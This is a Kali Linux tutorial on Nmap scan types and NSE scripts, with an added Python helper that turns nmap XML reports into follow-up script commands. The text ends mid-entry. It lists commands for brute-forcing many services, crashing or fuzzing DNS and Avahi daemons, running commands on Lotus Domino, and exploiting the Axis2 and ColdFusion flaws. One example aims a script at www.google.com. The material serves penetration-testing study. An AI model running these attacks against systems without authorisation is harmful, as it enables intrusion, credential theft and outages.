Nmap Tool in Kali Linux | Information gathering Using Nmap Tool in kali linux | Nmap Commands | Nmap Scripts

Nmap (Network Mapper) is a tool, pre-installed in Kali Linux, for scanning hosts and networks. It is used for reconnaissance, port scanning, service and operating-system detection and, through the Nmap Scripting Engine (NSE), for vulnerability checks and brute-force attacks. It is one of the most widely used information-gathering tools among penetration testers and security researchers. Because it ships with Kali Linux, you can use it directly from a terminal. Note that several of the scan types below (SYN, ACK, NULL and UDP scans, OS detection) send raw packets and must therefore be run as root (or with sudo).

BASIC COMMANDS OF NMAP:

Now we will discuss all the important commands of nmap. In each pattern below, a word preceded by + is a placeholder that you replace with your own value; the e.g. part shows a concrete command.

TO SCAN A SINGLE IP ADDRESS IN SIMPLE WAY:

(nmap +ip of the victim) e.g. (nmap 192.168.8.4)


Figure: Output of nmap for a single IP address

TO SCAN DOMAIN IN SIMPLE WAY:

(nmap +domain of website) e.g. (nmap nmap.org)

TO SCAN A NETWORK SIMPLY:

(nmap +network range) e.g. (nmap 192.168.8.0/24)

TO SCAN A SPECIFIC RANGE OF PORTS:

(nmap +ip of victim -p +range) e.g. (nmap 192.168.8.4 -p1-100)

TO SCAN A SINGLE PORT:

(nmap +ip of victim -p+port number) e.g. (nmap 192.168.8.4 -p17)

TO SCAN TARGETS FROM A FILE:

(nmap -iL +path of list having targets) e.g. (nmap -iL /root/Desktop/targets.txt)

TO SCAN A PORT BY SERVICE NAME (THE NAME IS LOOKED UP IN NMAP'S nmap-services FILE):

(nmap +ip or domain of target -p +service) e.g. (nmap 192.168.8.4 -p http)

TO SCAN A PORT OF A SPECIFIC PROTOCOL (T: FOR TCP, U: FOR UDP; ADD -sU WHENEVER UDP PORTS ARE LISTED):

(nmap +ip of target -p T:+tcp port,U:+udp port) e.g. (nmap 192.168.8.4 -p T:80) or (nmap -sS -sU 192.168.8.4 -p T:80,U:53)

TO SCAN ALL PORTS OF TARGET:

(nmap +ip of target -p-) e.g. (nmap 192.168.8.4 -p-)

TO SCAN SPECIFIC TOP PORTS:

(nmap +ip or domain --top-ports +numbers) e.g. (nmap 192.168.8.4 --top-ports 1000)

TO USE SYN SCAN (HALF-OPEN SCAN; THE DEFAULT WHEN RUNNING AS ROOT):

(nmap +ip or domain -sS) e.g. (nmap 192.168.8.4 -sS)

A SYN/ACK reply means the port is open, a RST means closed, and no reply (or an ICMP unreachable) means filtered.

TO USE ACK SCAN (TO MAP FIREWALL RULES, NOT TO FIND OPEN PORTS):

(nmap +ip or domain -sA) e.g. (nmap 192.168.8.4 -sA)

Ports that answer with a RST are reported as unfiltered (reachable through the firewall); ports with no reply are reported as filtered. An ACK scan never says whether a port is open.

TO USE UDP SCAN:

(nmap +ip or domain of target -sU) e.g. (nmap 192.168.8.4 -sU)

UDP scans are slow, and ports that do not answer are shown as open|filtered; combine with -sV to confirm which of them actually run a service.

TO USE TCP CONNECT SCAN (NO ROOT NEEDED, BUT THE FULL CONNECTION IS EASIER FOR THE TARGET TO LOG):

(nmap +ip or domain of website -sT) e.g. (nmap 192.168.8.4 -sT)

TO USE NULL SCAN:

(nmap -p+port number -sN +domain or ip) e.g. (nmap -p80 -sN 192.168.8.4)

No reply means open|filtered and a RST means closed. This works against RFC-compliant TCP stacks but not against Windows, which answers every NULL probe with a RST.

TO USE HIGH SPEED SCANNING:

(nmap +ip or domain -p +port range -T4) e.g. (nmap 192.168.8.4 -p1-10000 -T4)

TO SET HOST TIMEOUT AND SCAN DELAY (SLOWER SCANNING TO AVOID RATE-BASED FIREWALL OR IDS BLOCKING):

(nmap +domain or ip --host-timeout +time --scan-delay +time) e.g. (nmap 192.168.8.4 --host-timeout 30m --scan-delay 1s)

--scan-delay is the pause between probes sent to one host; --host-timeout is the time after which nmap gives up on that host. The timeout must be far larger than the delay multiplied by the number of ports, otherwise the host is abandoned before the scan finishes (a 3s host timeout with a 5s scan delay would not even send a second probe).

TO SAVE OUTPUT ABOUT TARGET IN A FILE:

(nmap +ip or domain or network range -oN +path of file to save) e.g. (nmap 192.168.8.4 -oN /root/Desktop/result.txt)

Use -oX for XML output (the format other tools parse best) or -oA +base name to write normal, XML and grepable files at once.

TO SEE SERVICES VERSIONS OF TARGET:

(nmap +ip  or domain of target -sV) e.g. (nmap 192.168.8.4 -sV)

TO SEE THE OPERATING SYSTEM OF TARGET (REQUIRES ROOT; A RELIABLE MATCH NEEDS AT LEAST ONE OPEN AND ONE CLOSED PORT):

(nmap +IP or domain of target -O) e.g. (nmap 192.168.8.4 -O)

FOR COMPLETE AND FULL SCANNING (-A = OS DETECTION, VERSION DETECTION, DEFAULT SCRIPTS AND TRACEROUTE):

(nmap +ip or domain of target -A) e.g. (nmap 192.168.8.4 -A)

FOR MORE DETAILED SCANNING OF ALL PORTS WITH SERVICES VERSIONS AND OS:

 (nmap -A -p- +ip of the victim) e.g. (nmap -A -p- 192.168.8.4)


Figure: Output for a complete scan

SCRIPTS:

Nmap Scripting Engine (NSE) scripts extend nmap with checks for specific services. Some scripts discover and enumerate services, some brute-force credentials on different protocols, some check for known vulnerabilities and some exploit a specific vulnerability. Scripts are grouped into categories (default, discovery, safe, intrusive, brute, vuln, exploit, auth, broadcast and others), and you can run a whole category, e.g. (nmap --script vuln 192.168.8.4), or several scripts in one command separated by commas, e.g. (nmap --script=ftp-anon,ftp-brute -p21 192.168.8.4).

The examples below use each script in a simple way; every script also accepts options through --script-args (for example --script-args userdb=users.txt,passdb=passwords.txt to give the brute-force scripts your own word lists instead of nmap's defaults), and you can combine scripts and options for a more powerful attack. Brute-force attacks, vulnerability analysis and exploitation are separate topics, but they are covered here because NSE scripts implement them.

The forms (--script=+name of script) and (--script +name of script) are equivalent; both appear below and either one works for every script. The .nse extension is optional.

You must use the correct port on which the service is running on your target. FTP runs on port 21 and HTTP on port 80 by default, but the target may use a different port, so run a version scan (-sV) first and take the port from its output. If a script is given the wrong port it simply does not run, because its port rule does not match, so always check which ports your target actually uses for each service.

All scripts are stored in /usr/share/nmap/scripts; to list them type:

(cd /usr/share/nmap/scripts)

(ls)

To read a script's documentation and its arguments, use (nmap --script-help +name of script) e.g. (nmap --script-help ftp-brute). Now we will use different scripts.
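As an added example (not part of the original page), the following Python script ties the two points above together: it reads the XML report nmap writes with -oX, keeps only the ports reported as open, and turns the detected services into follow-up --script command lines that use the right port and the right protocol prefix. The XML is a constructed sample in nmap's -oX format, not real scan output, and the choice of which scripts to pair with which service is this example's own (the script names themselves are real NSE scripts).

```python
"""Parse an nmap -oX report and build follow-up NSE script commands.

Added example; not part of the original page. SAMPLE_XML is a constructed
report in nmap's -oX format (not real scan output) resembling what
`nmap -sS -sU -sV -oX scan.xml 192.168.8.4` might write.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample: one host, four open ports (443 is closed and must be skipped).
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sS -sU -sV -oX scan.xml 192.168.8.4" version="7.94">
<host><status state="up" reason="arp-response"/>
<address addr="192.168.8.4" addrtype="ipv4"/>
<address addr="00:11:22:33:44:55" addrtype="mac"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp" product="vsftpd" version="3.0.3" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" version="2.4.41" method="probed" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="closed" reason="reset"/><service name="https" method="table" conf="3"/></port>
<port protocol="tcp" portid="548"><state state="open" reason="syn-ack"/><service name="afp" method="table" conf="3"/></port>
<port protocol="udp" portid="53"><state state="open" reason="udp-response"/><service name="domain" product="dnsmasq" version="2.80" method="probed" conf="10"/></port>
</ports>
</host>
<runstats><finished elapsed="12.31"/><hosts up="1" down="0" total="1"/></runstats>
</nmaprun>
"""

# nmap service name -> NSE scripts worth running next. The script names are
# real NSE scripts; pairing them with these services is this example's own
# choice (an assumption), not an nmap convention.
FOLLOWUP_SCRIPTS = {
    "ftp": ["ftp-anon", "ftp-brute"],
    "http": ["http-enum", "http-methods", "http-title"],
    "afp": ["afp-showmount", "afp-ls"],
    "domain": ["dns-nsid", "dns-recursion"],
}


def parse_open_ports(xml_text):
    """Return {ipv4: [(proto, port, service, product, version), ...]} for
    hosts that are up, keeping only the ports nmap reported as open."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        ports = []
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed / filtered ports get no follow-up
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            ports.append((port.get("protocol"), int(port.get("portid")), name, product, version))
        hosts[addr_el.get("addr")] = ports
    return hosts


def build_script_commands(hosts):
    """Emit one nmap command per (host, script). Ports carry the T:/U:
    prefix so TCP and UDP cannot be confused, and -sU is added whenever a
    UDP port is involved; without it the script's port rule never matches
    and the script silently does not run. -sS and -sU both need root."""
    commands = []
    for addr, ports in hosts.items():
        by_script = defaultdict(lambda: {"tcp": [], "udp": []})
        for proto, portid, name, _product, _version in ports:
            for script in FOLLOWUP_SCRIPTS.get(name, []):
                by_script[script][proto].append(portid)
        for script in sorted(by_script):
            tcp, udp = by_script[script]["tcp"], by_script[script]["udp"]
            spec = ",".join([f"T:{p}" for p in tcp] + [f"U:{p}" for p in udp])
            flags = " ".join(f for f, used in (("-sS", tcp), ("-sU", udp)) if used)
            commands.append(f"nmap {flags} -p {spec} --script {script} {addr}")
    return commands


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_XML)
    for addr, ports in found.items():
        for proto, portid, name, product, version in ports:
            print(f"{addr} {portid}/{proto} {name} {product} {version}".rstrip())
    print()
    print("\n".join(build_script_commands(found)))
```

Run it as `python3 nmap_followup.py` after replacing SAMPLE_XML with the contents of a real report written by (nmap -sS -sU -sV -oX scan.xml +target). The closed port 443 produces no command, and the UDP DNS service gets -sU with a U: prefix, which is exactly the detail that makes a script silently skip a port when it is omitted.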

TO PERFORM BRUTE FORCE ATTACK ON AFP SERVICE (APPLE FILING PROTOCOL, DEFAULT PORT 548):

(nmap -p+port of afp --script=afp-brute +ip or domain of target) e.g.

(nmap -p548 --script=afp-brute 192.168.8.4)

TO LIST FILES AND DIRECTORIES FROM AFP SHARES:

(nmap -sS -sV -p+port --script=afp-ls +domain or ip of target) e.g.

(nmap -sS -sV -p548 --script=afp-ls 192.168.8.4)

TO CHECK THE AFP SERVICE FOR THE DIRECTORY TRAVERSAL VULNERABILITY:

(nmap -sV --script=afp-path-vuln +domain or ip of target -p+port) e.g.

(nmap -sV --script=afp-path-vuln 192.168.8.4 -p548)

TO SHOW THE AFP SHARES OF TARGET:

(nmap -p+port of afp service --script=afp-showmount +domain or ip of target) e.g.

(nmap -p548 --script=afp-showmount 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON AJP SERVICE (APACHE JSERV PROTOCOL, DEFAULT PORT 8009):

(nmap -p+port --script=ajp-brute +domain or ip of target) e.g.

(nmap -p8009 --script=ajp-brute 192.168.8.4)

TO FETCH HTTP RESPONSE HEADERS THROUGH THE AJP SERVICE:

(nmap -p+port +domain or ip of target --script=ajp-headers) e.g.

(nmap -p8009 192.168.8.4 --script=ajp-headers)

TO SEE THE HTTP METHODS SUPPORTED THROUGH THE AJP SERVICE:

(nmap -p+port +domain or ip of target --script=ajp-methods) e.g.

(nmap -p8009 192.168.8.4 --script=ajp-methods)

TO QUERY ALL-SEEING EYE GAME SERVERS OF TARGET (UDP):

(nmap -sU +domain or ip of target --script=allseeingeye-info) e.g.

(nmap -sU 192.168.8.4 --script=allseeingeye-info)

TO GATHER INFORMATION FROM AN AMQP BROKER OF TARGET (DEFAULT PORT 5672):

(nmap --script amqp-info -p+port +domain or ip of target) e.g.

(nmap --script amqp-info -p5672 192.168.8.4)

TO CHECK WHETHER AN IDENT (AUTH) SERVER SPOOFS ITS REPLIES (DEFAULT PORT 113):

(nmap -sV --script=auth-spoof -p+port +domain or ip of target) e.g.

(nmap -sV --script=auth-spoof -p113 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON A BACK ORIFICE SERVICE OF TARGET (UDP, DEFAULT PORT 31337):

(nmap -sU --script=backorifice-brute -p+port +domain or ip of target) e.g.

(nmap -sU --script=backorifice-brute -p31337 192.168.8.4)

TO DISCOVER INFORMATION FROM BACNET DEVICES OF TARGET (UDP, DEFAULT PORT 47808):

(nmap --script bacnet-info -sU -p+port +domain or ip of target) e.g.

(nmap --script bacnet-info -sU -p47808 192.168.8.4)

TO GRAB SERVICE BANNERS OF TARGET:

(nmap -sV --script=banner -p+port +domain or ip of target) e.g.

(nmap -sV --script=banner -p80 192.168.8.4)

TO GET THE LIST OF PEER NODES KNOWN TO A BITCOIN NODE (DEFAULT PORT 8333):

(nmap --script=bitcoin-getaddr -p+port +domain or ip of target) e.g.

(nmap --script=bitcoin-getaddr -p8333 192.168.8.4)

TO GET INFORMATION FROM A BITCOIN JSON-RPC SERVER OF TARGET (DEFAULT PORT 8332; RPC CREDENTIALS ARE PASSED WITH --script-args creds.global=+user:password):

(nmap --script=bitcoinrpc-info --script-args creds.global=+user:password -p+port +domain or ip of target) e.g.

(nmap --script=bitcoinrpc-info --script-args creds.global=admin:secret -p8332 192.168.8.4)

TO GET DEVICE INFORMATION FROM A CANON BJNP PRINTER OR SCANNER (UDP, DEFAULT PORT 8611):

(nmap -sU --script bjnp-discover -p+port +domain or ip of target) e.g.

(nmap -sU --script bjnp-discover -p8611 192.168.8.4)

TO DISCOVER ATA-OVER-ETHERNET (AoE) SERVERS ON THE LOCAL SEGMENT:

(nmap --script broadcast-ataoe-discover -e +interface) e.g.

(nmap --script broadcast-ataoe-discover -e eth0)

Broadcast scripts send to the local network rather than to one target, so no IP address or port is needed and none is given below; they only discover devices on the segment you are connected to. The scripts that send or sniff raw frames (ataoe, igmp, listener, pim, pppoe) must be run as root, and -e +interface chooses the network interface when the machine has several.

TO DISCOVER LOCAL HOSTS OVER AVAHI/mDNS AND TEST THEM FOR THE AVAHI NULL-UDP-PACKET DENIAL OF SERVICE (INTRUSIVE, CAN CRASH THE DAEMON):

(nmap --script=broadcast-avahi-dos) e.g.

(nmap --script=broadcast-avahi-dos)

TO DISCOVER BJNP-CAPABLE PRINTERS AND SCANNERS ON THE LOCAL NETWORK:

(nmap --script broadcast-bjnp-discover) e.g.

(nmap --script broadcast-bjnp-discover)

TO DISCOVER DB2 SERVERS ON THE LOCAL NETWORK:

(nmap --script broadcast-db2-discover) e.g.

(nmap --script broadcast-db2-discover)

TO DISCOVER HOSTS AND SERVICES USING DNS SERVICE DISCOVERY (mDNS/DNS-SD):

(nmap --script=broadcast-dns-service-discovery) e.g.

(nmap --script=broadcast-dns-service-discovery)

TO LISTEN FOR DROPBOX LAN SYNC ANNOUNCEMENTS (HOST AND NAMESPACE IDS OF DROPBOX CLIENTS):

(nmap --script=broadcast-dropbox-listener) e.g.

(nmap --script=broadcast-dropbox-listener)

TO DISCOVER HOSTS WITH IGMP MULTICAST MEMBERSHIPS:

(nmap --script broadcast-igmp-discovery -e +interface) e.g.

(nmap --script broadcast-igmp-discovery -e eth0)

TO SNIFF THE NETWORK FOR INCOMING BROADCAST COMMUNICATION:

(nmap --script broadcast-listener -e +interface) e.g.

(nmap --script broadcast-listener -e eth0)

TO DISCOVER MS SQL SERVERS ON THE LOCAL NETWORK:

(nmap --script broadcast-ms-sql-discover) e.g.

(nmap --script broadcast-ms-sql-discover)

TO DISCOVER THE NETBIOS MASTER BROWSER AND THE DOMAINS IT MANAGES:

(nmap --script=broadcast-netbios-master-browser) e.g.

(nmap --script=broadcast-netbios-master-browser)

TO DISCOVER EMC NETWORKER BACKUP SERVERS ON THE LOCAL NETWORK:

(nmap --script broadcast-networker-discover) e.g.

(nmap --script broadcast-networker-discover)

TO DISCOVER NOVELL NCP SERVERS:

(nmap --script=broadcast-novell-locate) e.g.

(nmap --script=broadcast-novell-locate)

TO DISCOVER pcAnywhere HOSTS ON THE LAN:

(nmap --script broadcast-pc-anywhere) e.g.

(nmap --script broadcast-pc-anywhere)

TO DISCOVER PPPoE SERVERS (ACCESS CONCENTRATORS):

(nmap --script broadcast-pppoe-discover -e +interface) e.g.

(nmap --script broadcast-pppoe-discover -e eth0)

TO DISCOVER ROUTERS USING PIM:

(nmap --script broadcast-pim-discovery -e +interface) e.g.

(nmap --script broadcast-pim-discovery -e wlan0)

TO DISCOVER HOSTS AND DEVICES RUNNING RIP VERSION 2 IN THE LAN:

(nmap --script broadcast-rip-discover) e.g.

(nmap --script broadcast-rip-discover)

TO DISCOVER HOSTS AND DEVICES RUNNING RIPng IN THE LAN:

(nmap --script broadcast-ripng-discover) e.g.

(nmap --script broadcast-ripng-discover)

TO DISCOVER SYBASE ANYWHERE SERVERS ON THE LAN:

(nmap --script broadcast-sybase-asa-discover) e.g.

(nmap --script broadcast-sybase-asa-discover)

TO DISCOVER TELLDUS TECHNOLOGIES TELLSTICKNET DEVICES ON THE LAN:

(nmap --script broadcast-tellstick-discover) e.g.

(nmap --script broadcast-tellstick-discover)

TO COLLECT INFORMATION FROM UPnP DEVICES ON THE LAN:

(nmap --script=broadcast-upnp-info) e.g.

(nmap --script=broadcast-upnp-info)

TO DISCOVER VERSANT OBJECT DATABASES ON THE LAN:

(nmap --script broadcast-versant-locate) e.g.

(nmap --script broadcast-versant-locate)

TO WAKE A SYSTEM FROM SLEEP MODE (WAKE-ON-LAN), GIVEN ITS MAC ADDRESS:

(nmap --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC=+mac address of target) e.g.

(nmap --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC='00:11:22:33:44:55')

TO DISCOVER PROXY SERVERS ADVERTISED THROUGH WPAD ON THE LAN:

(nmap --script broadcast-wpad-discover) e.g.

(nmap --script broadcast-wpad-discover)

TO DISCOVER DEVICES SUPPORTING WEB SERVICES DYNAMIC DISCOVERY (WS-Discovery):

(nmap --script broadcast-wsdd-discover) e.g.

(nmap --script broadcast-wsdd-discover)

TO PERFORM BRUTE FORCE ATTACK ON CASSANDRA (THRIFT RPC, DEFAULT PORT 9160):

(nmap -p+port +domain or ip of target --script=cassandra-brute) e.g.

(nmap -p9160 192.168.8.4 --script=cassandra-brute)

TO GET INFORMATION FROM CASSANDRA DATABASE:

(nmap -p+port +domain or ip of target --script=cassandra-info) e.g.

(nmap -p9160 192.168.8.4 --script=cassandra-info)

TO DISCOVER PUBLISHED APPLICATIONS FROM THE CITRIX ICA BROWSER SERVICE (UDP, DEFAULT PORT 1604):

(nmap -sU --script=citrix-enum-apps -p+port +domain or ip of target) e.g.

(nmap -sU --script=citrix-enum-apps -p1604 192.168.8.4)

TO DISCOVER APPLICATIONS, ACLS AND SETTINGS FROM THE CITRIX XML SERVICE (RUNS OVER HTTP, USUALLY PORT 80 OR 8080):

(nmap --script=citrix-enum-apps-xml -p+port +domain or ip of target) e.g.

(nmap --script=citrix-enum-apps-xml -p80 192.168.8.4)

TO DISCOVER CITRIX SERVERS FROM THE ICA BROWSER SERVICE:

(nmap -sU --script=citrix-enum-servers -p+port +domain or ip of target)  e.g.

(nmap -sU --script=citrix-enum-servers -p1604 192.168.8.4)

TO GET THE NAME OF THE SERVER FARM AND ITS MEMBER SERVERS FROM THE CITRIX XML SERVICE:

(nmap --script=citrix-enum-servers-xml -p+port +domain or ip of target) e.g.

(nmap --script=citrix-enum-servers-xml -p80 192.168.8.4)

TO LIST THE DATABASES OF A COUCHDB SERVER (DEFAULT PORT 5984):

(nmap --script couchdb-databases -p+port +domain or ip of target) e.g.

(nmap --script couchdb-databases -p5984 192.168.8.4)

TO GET DATABASE STATISTICS FROM A COUCHDB SERVER:

(nmap --script couchdb-stats -p+port +domain or ip of target) e.g.

(nmap --script couchdb-stats -p5984 192.168.8.4)

TO GET THE LIST OF PRINTERS FROM A CUPS PRINT SERVER (DEFAULT PORT 631):

(nmap --script cups-info -p+port +domain or ip of target) e.g.

(nmap --script cups-info -p631 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON CVS PSERVER AUTHENTICATION (DEFAULT PORT 2401):

(nmap --script cvs-brute -p+port +domain or ip of target) e.g.

(nmap --script cvs-brute -p2401 192.168.8.4)

TO GUESS THE NAMES OF CVS REPOSITORIES OF TARGET:

(nmap --script cvs-brute-repository -p+port +domain or ip of target) e.g.

(nmap --script cvs-brute-repository -p2401 192.168.8.4)

TO GET THE MUSIC LIBRARY FROM A DAAP SERVER (iTunes SHARING, DEFAULT PORT 3689):

(nmap -sV --script=daap-get-library -p+port +domain or ip of target) e.g.

(nmap -sV --script=daap-get-library -p3689 192.168.8.4)

TO DISCOVER DHCP SERVERS AND THE OPTIONS THEY HAND OUT (UDP, PORT 67):

(nmap -sU --script=dhcp-discover -p+port +domain or ip of target) e.g.

(nmap -sU --script=dhcp-discover -p67 192.168.8.4)

TO RESOLVE A DOMAIN AS SEEN FROM DIFFERENT CLIENT SUBNETS (EDNS CLIENT SUBNET; DNS USES PORT 53, UDP AND TCP):

(nmap -sU --script dns-client-subnet-scan --script-args dns-client-subnet-scan.domain=+domain to look up -p+port +ip of dns server) e.g.

(nmap -sU --script dns-client-subnet-scan --script-args dns-client-subnet-scan.domain=example.com -p53 192.168.8.4)

TO FUZZ A DNS SERVER WITH MALFORMED PACKETS (INTRUSIVE, MAY CRASH THE SERVER):

(nmap -sU --script dns-fuzz -p+port +ip of dns server) e.g.

(nmap -sU --script dns-fuzz -p53 192.168.8.4)

TO ENUMERATE DNS NAMES USING DNSSEC NSEC WALKING:

(nmap -sU --script dns-nsec-enum --script-args dns-nsec-enum.domains=+domain -p+port +ip of dns server) e.g.

(nmap -sU --script dns-nsec-enum --script-args dns-nsec-enum.domains=example.com -p53 192.168.8.4)

TO ENUMERATE DNS NAMES USING DNSSEC NSEC3 WALKING (THE COLLECTED HASHES STILL HAVE TO BE CRACKED OFFLINE):

(nmap -sU --script=dns-nsec3-enum --script-args dns-nsec3-enum.domains=+domain -p+port +ip of dns server) e.g.

(nmap -sU --script=dns-nsec3-enum --script-args dns-nsec3-enum.domains=example.com -p53 192.168.8.4)

TO GET THE NAME SERVER IDENTIFIER (NSID) AND VERSION STRING FROM A DNS SERVER:

(nmap -sU --script dns-nsid -p+port +ip of dns server) e.g.

(nmap -sU --script dns-nsid -p53 192.168.8.4)

TO CHECK WHETHER A RECURSIVE DNS SERVER USES PREDICTABLE SOURCE PORTS (CACHE POISONING RISK):

(nmap -sU --script=dns-random-srcport -p+port +ip of dns server) e.g.

(nmap -sU --script=dns-random-srcport -p53 192.168.8.4)

TO CHECK WHETHER A RECURSIVE DNS SERVER USES PREDICTABLE TRANSACTION IDS (TXID):

(nmap -sU --script=dns-random-txid -p+port +ip of dns server) e.g.

(nmap -sU --script=dns-random-txid -p53 192.168.8.4)

TO DISCOVER COMMON SRV RECORDS OF A DOMAIN (THIS SCRIPT RUNS BEFORE THE SCAN AND NEEDS ONLY THE DOMAIN):

(nmap --script dns-srv-enum --script-args dns-srv-enum.domain=+domain) e.g.

(nmap --script dns-srv-enum --script-args dns-srv-enum.domain=example.com)

TO TEST WHETHER A DNS SERVER ACCEPTS DYNAMIC UPDATES WITHOUT AUTHENTICATION (INTRUSIVE: IT ADDS A RECORD, SO REMOVE IT AFTERWARDS):

(nmap -sU --script=dns-update --script-args dns-update.hostname=+name to add,dns-update.ip=+ip to add -p+port +ip of dns server) e.g.

(nmap -sU --script=dns-update --script-args dns-update.hostname=test.example.com,dns-update.ip=192.168.8.99 -p53 192.168.8.4)

TO REQUEST A ZONE TRANSFER (AXFR) FROM A DNS SERVER (TCP PORT 53):

(nmap --script=dns-zone-transfer --script-args dns-zone-transfer.domain=+domain -p+port +ip of dns server) e.g.

(nmap --script=dns-zone-transfer --script-args dns-zone-transfer.domain=example.com -p53 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON LOTUS DOMINO CONSOLE (DEFAULT PORT 2050):

(nmap --script domcon-brute -p+port +domain or ip of target) e.g.

(nmap --script domcon-brute -p2050 192.168.8.4)

TO RUN A COMMAND ON A LOTUS DOMINO CONSOLE USING KNOWN CREDENTIALS:

(nmap -p+port +domain or ip of target --script domcon-cmd --script-args domcon-cmd.cmd=+command,domcon-cmd.user=+user,domcon-cmd.pass=+password) e.g.

(nmap -p2050 192.168.8.4 --script domcon-cmd --script-args domcon-cmd.cmd='show server',domcon-cmd.user=admin,domcon-cmd.pass=secret)

TO ENUMERATE USERS OF A LOTUS DOMINO SERVER OVER HTTP:

(nmap --script domino-enum-users -p+port +domain or ip of target) e.g.

(nmap --script domino-enum-users -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON AN IPHOTO SHARING (DPAP) LIBRARY (DEFAULT PORT 8770):

(nmap --script dpap-brute -p+port +domain or ip of target) e.g.

(nmap --script dpap-brute -p8770 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON DRDA (IBM DB2, DEFAULT PORT 50000):

(nmap --script drda-brute -p+port +domain or ip of target) e.g.

(nmap --script drda-brute -p50000 192.168.8.4)

TO LIST RUNNING PROCESSES THROUGH THE APPLE REMOTE EVENT PROTOCOL (eppc, DEFAULT PORT 3031; A VALID USERNAME AND PASSWORD MUST BE SUPPLIED WITH --script-args, SEE nmap --script-help eppc-enum-processes):

(nmap -p+port +domain or ip of target --script eppc-enum-processes) e.g.

(nmap -p3031 192.168.8.4 --script eppc-enum-processes)

TO DISCOVER A FREELANCER GAME SERVER (UDP, DEFAULT PORT 2302):

(nmap -sU --script=freelancer-info -p+port +domain or ip of target) e.g.

(nmap -sU --script=freelancer-info -p2302 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON FTP SERVICE OF TARGET:

(nmap --script ftp-brute -p+port +domain or ip of target) e.g.

(nmap --script ftp-brute -p21 192.168.8.4)

TO CHECK CVE-2010-1938 VULNERABILITY IN FTP SERVICE:

(nmap -sV --script=ftp-libopie -p+port +domain or ip of target) e.g.

(nmap -sV --script=ftp-libopie -p21 192.168.8.4)

TO GET CLUSTER AND HOST INFORMATION (INCLUDING OPERATING SYSTEM DETAILS) FROM A GANGLIA MONITORING DAEMON (gmond, DEFAULT PORT 8649):

(nmap --script ganglia-info -p+port +domain or ip of target) e.g.

(nmap --script ganglia-info -p8649 192.168.8.4)

TO GET GPS TIME, POSITION AND OTHER DATA FROM A GPSD SERVER (DEFAULT PORT 2947):

(nmap -p+port +domain or ip of target --script gpsd-info) e.g.

(nmap -p2947 192.168.8.4 --script gpsd-info)

TO GET INFORMATION FROM AN APACHE HBASE MASTER (WEB UI, DEFAULT PORT 60010):

(nmap --script hbase-master-info -p+port +domain or ip of target) e.g.

(nmap --script hbase-master-info -p60010 192.168.8.4)

TO GET INFORMATION FROM AN APACHE HBASE REGION SERVER (WEB UI, DEFAULT PORT 60030):

(nmap --script hbase-region-info -p+port +domain or ip of target) e.g.

(nmap --script hbase-region-info -p60030 192.168.8.4)

TO GET HARDWARE AND FIRMWARE DETAILS FROM A DEVICE SUPPORTING HNAP (HOME NETWORK ADMINISTRATION PROTOCOL, USUALLY PORT 80):

(nmap --script hnap-info -p+port +domain or ip of target) e.g.

(nmap --script hnap-info -p80 192.168.8.4)

TO CHECK ADOBE COLDFUSION SERVER VULNERABILITY TO GET ADMIN SESSION COOKIE:

(nmap -sV --script http-adobe-coldfusion-apsa1301 -p+port +domain or ip of target) e.g.

(nmap -sV --script http-adobe-coldfusion-apsa1301 -p80 192.168.8.4)

TO DISCOVER AFFILIATE NETWORK IDS FROM A WEB PAGE:

(nmap --script=http-affiliate-id.nse -p+port +domain or ip of target) e.g.

(nmap --script=http-affiliate-id.nse -p80 www.google.com)

TO CHECK WHETHER APACHE mod_negotiation (MultiViews) IS ENABLED, WHICH CAN LEAK FILE NAMES:

(nmap --script=http-apache-negotiation -p+port +domain or ip of target) e.g.

(nmap --script=http-apache-negotiation -p80 192.168.8.4)

TO CHECK THE AUTHENTICATION SCHEME OF TARGET WEBSITE SERVICE:

(nmap --script http-auth -p+port +domain or ip of target)  e.g.

(nmap --script http-auth -p80 vulnweb.com)

TO FIND TARGET WEB PAGES HAVING FORM-BASED OR HTTP-BASED AUTHENTICATION:

(nmap --script http-auth-finder -p+port +domain or ip of target) e.g.

(nmap --script http-auth-finder -p80 192.168.8.4)

TO FIND USERS IN AVAYA IP OFFICE SYSTEM 7.X:

(nmap --script http-avaya-ipoffice-users -p+port +domain or ip of target) e.g.

(nmap --script http-avaya-ipoffice-users -p80,8083 192.168.8.4)

TO EXPLOIT DIRECTORY TRAVERSAL VULNERABILITY IN APACHE AXIS2 VERSION 1.4.1:

(nmap --script http-axis2-dir-traversal -p+port +domain or ip of target) e.g.

(nmap --script http-axis2-dir-traversal -p80 192.168.8.4)

TO FIND BACKUP COPIES OF DISCOVERED FILES (e.g. index.php~, index.php.bak):

(nmap --script=http-backup-finder -p+port +domain or ip of target) e.g.

(nmap --script=http-backup-finder -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON HTTP SERVICE:

(nmap --script http-brute -p+port +domain or ip of target) e.g.

(nmap --script http-brute -p80 192.168.8.4)

TO DISCOVER THE CAKEPHP VERSION OF TARGET WEBSITE:

(nmap --script http-cakephp-version -p+port +domain or ip of target) e.g.

(nmap --script http-cakephp-version -p80 192.168.8.4)

TO MEASURE HOW LONG THE TARGET WEB SERVER TAKES TO ANSWER REQUESTS (MIN, MAX AND AVERAGE):

(nmap --script http-chrono -p+port +domain or ip of target) e.g.

